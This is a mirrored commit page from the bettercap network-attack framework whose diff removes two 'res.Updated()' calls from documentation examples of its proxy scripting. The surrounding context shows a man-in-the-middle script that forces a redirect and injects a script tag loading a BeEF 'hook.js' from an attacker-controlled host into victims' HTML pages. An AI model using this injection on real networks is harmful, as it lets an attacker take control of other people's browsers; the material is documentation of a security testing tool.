mirror of
https://github.com/bettercap/bettercap
synced 2025-08-20 13:33:21 -07:00
balls
This commit is contained in:
parent
adc2dde170
commit
22760e12b2
1 changed files with 0 additions and 2 deletions
|
@ -276,7 +276,6 @@ function onRequest(req, res) {
|
|||
res.Status = 301;
|
||||
res.Headers = "Location: https://www.facebook.com/\n" +
|
||||
"Connection: close";
|
||||
res.Updated()
|
||||
}
|
||||
}
|
||||
```
|
||||
|
@ -316,7 +315,6 @@ function onResponse(req, res) {
|
|||
'</head>',
|
||||
'<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>'
|
||||
);
|
||||
res.Updated();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue